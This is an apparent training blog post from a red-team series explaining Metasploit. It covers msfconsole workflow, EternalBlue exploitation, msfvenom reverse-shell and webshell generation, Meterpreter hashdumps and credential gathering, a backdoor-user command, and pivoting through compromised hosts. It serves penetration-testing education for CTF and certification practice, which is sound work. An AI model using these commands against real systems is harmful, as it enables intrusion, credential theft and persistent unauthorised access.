top of page

MeshForge

Metasploit: The Exploitation Framework That Handles the Complexity


Series: The Community's Red Team

Post: 12 of 17

Tags: metasploit, msfconsole, meterpreter, exploitation, post-exploitation, tools

Read time: ~13 min

Prerequisites: Post 01 — Methodology Overview, Post 11 — Netcat


Metasploit has a reputation problem. In movies and TV it's the "press button, get hacked" tool that makes hacking look trivial. In beginner CTF writeups it's treated as a crutch. In real security work, it's an industrial-grade framework that senior red teamers use every day because it handles complexity that would take hours to build manually.

The truth is somewhere in the middle: Metasploit doesn't do the thinking for you, but it does handle an enormous amount of technical complexity so you can focus on the engagement rather than the implementation. Payload staging, session management, post-exploitation modules, pivoting through networks — all of it is built in and works together.

This post covers how Metasploit actually works, the core workflow you'll repeat on every engagement, Meterpreter's post-exploitation capabilities, and when to use the framework vs. manual techniques.


What Metasploit Is

Metasploit is a Ruby framework organized around modules. Each module does one specific thing:

Exploit modules — take a vulnerability and use it to get code execution on a target. They deliver a payload.

Payload modules — the code that runs on the target after exploitation. This is what gives you a shell.

Auxiliary modules — scanners, fuzzers, brute force tools, information gathering. No payload needed — they just run and return data.

Post modules — run after you have a session. Hashdumps, privilege escalation checks, information gathering from inside a compromised machine.

Encoder modules — transform payloads to evade detection.

Everything works together: an exploit module selects a payload, delivers it, creates a session, and then post modules work against that session.


Starting and Navigating msfconsole

msfconsole -q    # -q skips the banner, launches faster

Inside the console:

search <term>              # Search modules by name, CVE, or platform
use <module_path>          # Select a module
info                       # Show details about the current module
show options               # Show required and optional settings
show payloads              # List compatible payloads for current module
set <OPTION> <value>       # Set an option
setg <OPTION> <value>      # Set globally (persists across modules)
unset <OPTION>             # Clear an option
exploit / run              # Launch the module
sessions -l                # List active sessions
sessions -i <id>           # Interact with a session
sessions -k <id>           # Kill a session
background                 # Background current session (or Ctrl+Z)
jobs                       # List running background jobs

The most common beginner failure: forgetting to set LHOST. Always run show options before launching and verify all required fields are set.


The Core Exploitation Workflow

Step 1 — Search for the right module

# Search by CVE
search cve:2017-0144

# Search by name
search type:exploit name:eternalblue
search type:exploit name:tomcat

# Search by platform
search platform:windows type:exploit smb

# Search auxiliary scanners
search type:auxiliary name:smb_ms17

Step 2 — Select and configure the module

use exploit/windows/smb/ms17_010_psexec
show options
set RHOSTS 10.10.10.50
set LHOST 10.10.14.5     # your attack machine IP (tun0 on HTB)
set LPORT 4444

RHOSTS — target IP(s). Accepts single IPs, CIDR ranges, and file paths with a list.

LHOST — your machine's IP. On HackTheBox/CTF this is your tun0 VPN interface. Get it with ip a show tun0.

Check show payloads to see what payload options you have. The default is usually fine but you may want to change it:

set PAYLOAD windows/x64/meterpreter/reverse_tcp

Step 3 — Run it

exploit
# or
run
# or to run as a background job:
exploit -j

A successful run gives you a Meterpreter session (or a shell, depending on payload). The session counter shows in the output:

[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.50:49832)

Staged vs Stageless Payloads

This distinction matters for reliability and detection:

Staged payload (e.g. windows/x64/meterpreter/reverse_tcp) — sends a small initial payload that then downloads the full Meterpreter from your machine. Requires a handler listening on LHOST:LPORT. Smaller initial footprint.

Stageless payload (e.g. windows/x64/meterpreter_reverse_tcp) — the full Meterpreter is embedded in the payload. Larger but doesn't need a separate download step. More reliable in restrictive network environments.

Note the difference: /reverse_tcp (staged, forward slash) vs reversetcp (stageless, underscore).

For CTF environments, staged is usually fine. For environments with tight egress filtering, stageless is more reliable.


Catching Shells with multi/handler

When you generate a payload with msfvenom and execute it manually on a target, you need a handler to catch the connection:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp    # match your payload exactly
set LHOST 10.10.14.5
set LPORT 4444
exploit -j    # run as background job so you can keep using the console

The payload type in your handler must match the payload you generated with msfvenom exactly. Mismatch = no session.


Meterpreter: The Good Stuff

A basic Netcat shell gives you a terminal. Meterpreter gives you a programmable interface to the compromised system. Here's what you can do:

System information

sysinfo          # OS, hostname, architecture, language
getuid           # Current user (who are you running as?)
getpid           # Current process ID
ps               # List running processes

Privilege escalation

getsystem        # Try common privesc techniques automatically
getuid           # Verify you're now SYSTEM/root

getsystem attempts several escalation techniques in sequence. It doesn't always work, but when it does it's one command.

File operations

pwd              # Current directory on target
ls               # List files
cd <path>        # Change directory
cat <file>       # Read file contents
download <file>              # Download to your attack machine
upload /path/to/local/file   # Upload to target

File transfers through Meterpreter are encrypted and don't require setting up separate HTTP servers or Netcat listeners.

Shell access

shell            # Drop to a native OS shell (cmd.exe or /bin/bash)
# Ctrl+Z to background and return to Meterpreter

Process migration

migrate <pid>    # Move Meterpreter into another process

Migration is important for stability and stealth. If your initial exploit ran in a web server process that gets restarted, your session dies. Migrate to a stable process like explorer.exe or svchost.exe to persist. Also useful for privilege escalation — if a process running as a higher-privilege user is on the machine, migrating into it can elevate your access.

Enable RDP

run post/windows/manage/enable_rdp

One command enables Remote Desktop on a Windows target so you can connect graphically.


Post-Exploitation Modules

Post modules run against existing sessions and automate common post-exploitation tasks:

# List privesc opportunities
run post/multi/recon/local_exploit_suggester

# Dump local password hashes
run post/windows/gather/hashdump

# Gather saved credentials from browsers and applications
run post/windows/gather/credentials/credential_collector

# Enable RDP
run post/windows/manage/enable_rdp

# Add a persistent backdoor user
run post/windows/manage/add_user USERNAME=backdoor PASSWORD=Password123!

To run a post module against a specific session:

sessions -l              # Get the session ID
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

Pivoting with Metasploit

Once you have a Meterpreter session on a machine that can reach an internal network, Metasploit can route traffic through it:

# Background the session
background    # or Ctrl+Z

# Add a route through the session into the internal network
sessions -i 1
run autoroute -s 172.16.5.0/16

# Start a SOCKS proxy through the session
use auxiliary/server/socks_proxy
set SRVPORT 9050
set VERSION 4a
run

# Now configure proxychains and use any tool through the tunnel
# /etc/proxychains.conf: socks4 127.0.0.1 9050
proxychains nmap -Pn -sT 172.16.5.19

This makes the entire internal network reachable from your attack machine through the Meterpreter session. Covered in more depth in Post 15 (Chisel) and Post 16 (Ligolo-ng).


Auxiliary Modules: Scanning and Enumeration

Metasploit isn't just for exploitation. Auxiliary modules are useful for scanning and service-specific checks:

# Check if a target is vulnerable to EternalBlue before exploiting
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.10.10.0/24
run

# SMB version scanner
use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.10.0/24
run

# Tomcat credential brute force
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS <target>
set RPORT 8080
run

# HTTP directory scanner
use auxiliary/scanner/http/dir_scanner
set RHOSTS <target>
run

Using auxiliary/scanner/smb/smb_ms17_010 before the exploit confirms the target is vulnerable without triggering the exploitation — quieter and saves time if the target is already patched.


msfvenom: Generating Standalone Payloads

When you need a payload that runs outside of msfconsole — an executable to upload, a web shell, a WAR file for Tomcat — use msfvenom:

# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f exe -o shell.exe

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f elf -o shell.elf

# PHP webshell
msfvenom -p php/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f raw -o shell.php

# Tomcat WAR file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=4444 -f war -o shell.war

# ASP for IIS
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f aspx -o shell.aspx

# List all payloads
msfvenom --list payloads | grep windows

# List all formats
msfvenom --list formats

When you deploy an msfvenom payload, set up your multi/handler before triggering the payload execution — the handler needs to be waiting when the connection arrives.


When to Use Metasploit vs Manual Exploitation

Metasploit handles the plumbing — payload delivery, session management, encrypted communications, pivoting infrastructure. It's the right choice when:

  • You have a known CVE and a Metasploit module exists for it

  • You need post-exploitation capabilities beyond a basic shell

  • You're managing multiple sessions on a complex network

  • You want pivoting through a Meterpreter session

Manual exploitation (writing your own exploit code, using standalone tools like Impacket) is right when:

  • No Metasploit module exists for the vulnerability

  • You're in an environment where dropping a Meterpreter binary would trigger EDR

  • OSCP exam constraints require manual exploitation (check current rules before your exam)

  • You want to actually understand what the exploit does

The CPTS exam doesn't restrict Metasploit use. OSCP has historically limited it — check current rules if certification prep is your goal.


Common Problems and Fixes

"Exploit completed, but no session was created": Most common cause: LHOST is wrong. Verify your attack machine IP on the correct interface (tun0 for HTB, eth0 for local lab). Also check if the target can reach your LHOST — test with a ping or curl callback first.

Session immediately dies: Migrate to a stable process immediately after getting the session: migrate <pid> to explorer.exe or svchost.exe.

Module says "no compatible payloads": The architecture may not match — the target is 32-bit but you're loading a 64-bit payload. Run show payloads and look for x86 options.

getsystem fails: Manual privilege escalation needed. Run post/multi/recon/local_exploit_suggester to find opportunities, then tackle them manually or with specific modules.


Quick Reference

# Launch
msfconsole -q

# Navigation
search type:exploit cve:2017-0144
use exploit/windows/smb/ms17_010_psexec
show options
set RHOSTS <target>
set LHOST <your_ip>
setg LHOST <your_ip>    # global — set once, works everywhere
exploit -j

# Handler
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT 4444
exploit -j

# Sessions
sessions -l
sessions -i 1
background

# Meterpreter
sysinfo | getuid | getpid | ps
getsystem
shell
migrate <pid>
download <file>
upload <file> <remote_path>
run post/multi/recon/local_exploit_suggester
run post/windows/gather/hashdump

# Pivoting
run autoroute -s 172.16.5.0/16

# msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f exe -o shell.exe
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=4444 -f war -o shell.war
msfvenom --list payloads | grep linux

What's Next

With Metasploit handling exploitation and session management, the next two posts cover privilege escalation — what you do after you get a shell but need more access. Post 13 (LinPEAS/WinPEAS) is the automated recon tool that finds the privesc opportunities on Linux and Windows targets. It's the first thing you run on every machine you land on.

MeshForge — Training the Community's Red Team

They count on your ignorance. The exploit only works on the uninformed.

 
 
 

Comments

bottom of page